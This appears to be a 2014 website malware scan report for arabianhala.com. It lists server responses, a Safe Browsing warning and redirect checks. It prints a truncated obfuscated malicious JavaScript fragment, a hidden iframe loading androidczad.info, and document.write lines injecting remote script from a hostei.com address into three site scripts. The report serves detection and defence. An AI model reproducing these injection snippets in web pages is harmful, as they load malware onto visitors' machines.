Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=arabianhala.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://arabianhala.com/ | HTTP/1.1 200 OK Date: Fri, 25 Apr 2014 19:49:07 GMT Accept-Ranges: bytes ETag: "1aaca7925adcd1:1d64" Server: Microsoft-IIS/6.0 Content-Length: 13570 Content-Location: http://arabianhala.com/index.html Content-Type: text/html Last-Modified: Thu, 18 Oct 2012 07:52:51 GMT MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET | clean |
http://arabianhala.com/index.html | 200 OK Content-Length: 13570 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var VeQM;var xBQdHr;var bZDep='yRqJ';if('xsYL'=='XEBKj')oHdBFL='OvfAIR';function lMchhr(){}if('xTTX'=='bjlV')qXYO();var eXpcWQX="\x66ro\x6d\x43harCode";var PiaPr;var zPKoP=162;var px0_var="0px";var tDLo='noeX';var hZkmb="pa\x72seIn\x74";var MOwN=279;var appVersion_var="a\x70\x70Version";var GfrLcV;var mMyDLv=268;var oJyWtFC="bo\x64\x79";var MzkStJ;var LQRx='YvZrr';var EIpRgmLbl="ap\x70e\x6edC\x68ild";var aQdP=245;function LBEXN(){var mjghS='QZkm';if('Feourr'=='RKwRp')OXzNS();} var jHgyFfTIn="";v Antivirus reports:
Hidden iFrame found. The same iFrame was found in 220 websites. style: hidden src: http://androidczad.info/ <iframe style="visibility: hidden; display: none; display: none;" src="http://androidczad.info/"> | ||
http://arabianhala.com/slideshow.js | 200 OK Content-Length: 19826 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://pruebahuaralino.hostei.com/FzC9KRjG.php?id=86657652"></script>'); | ||
http://arabianhala.com/scripts/ocdvs=___scroller_html.js | 200 OK Content-Length: 6246 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://pruebahuaralino.hostei.com/FzC9KRjG.php?id=86657711"></script>'); | ||
http://arabianhala.com/scripts/dvs_script.js | 200 OK Content-Length: 20023 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://pruebahuaralino.hostei.com/FzC9KRjG.php?id=86657709"></script>'); | ||
http://arabianhala.com/../www.statcounter.com/counter/counter.js | 403 Forbidden Content-Length: 32 Content-Type: text/html | clean |
http://arabianhala.com/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: arabianhala.com
Result:
HTTP/1.1 200 OK
Date: Fri, 25 Apr 2014 19:49:07 GMT
Accept-Ranges: bytes
ETag: "1aaca7925adcd1:1d64"
Server: Microsoft-IIS/6.0
Content-Length: 13570
Content-Location: http://arabianhala.com/index.html
Content-Type: text/html
Last-Modified: Thu, 18 Oct 2012 07:52:51 GMT
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
...13570 bytes of data.
GET / HTTP/1.1
Host: arabianhala.com
Result:
HTTP/1.1 200 OK
Date: Fri, 25 Apr 2014 19:49:07 GMT
Accept-Ranges: bytes
ETag: "1aaca7925adcd1:1d64"
Server: Microsoft-IIS/6.0
Content-Length: 13570
Content-Location: http://arabianhala.com/index.html
Content-Type: text/html
Last-Modified: Thu, 18 Oct 2012 07:52:51 GMT
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
...13570 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: arabianhala.com
Referer: http://www.google.com/search?q=arabianhala.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: arabianhala.com
Referer: http://www.google.com/search?q=arabianhala.com
Result:
The result is similar to the first query. There are no suspicious redirects found.